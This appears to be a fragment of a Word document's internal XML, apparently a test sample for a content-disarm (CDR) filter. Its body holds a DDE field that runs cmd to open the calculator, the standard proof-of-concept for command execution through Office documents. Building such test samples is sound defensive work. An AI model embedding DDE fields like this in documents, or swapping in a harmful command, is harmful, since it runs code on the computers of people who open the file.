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CDR Test: DDE Field Document</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> DDE WINWORD "C:\\windows\\system32\\cmd" "/c calc" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>DDE result placeholder</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
  </w:body>
</w:document>
</file>

<file path=word/_rels/document.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"></Relationships>
</file>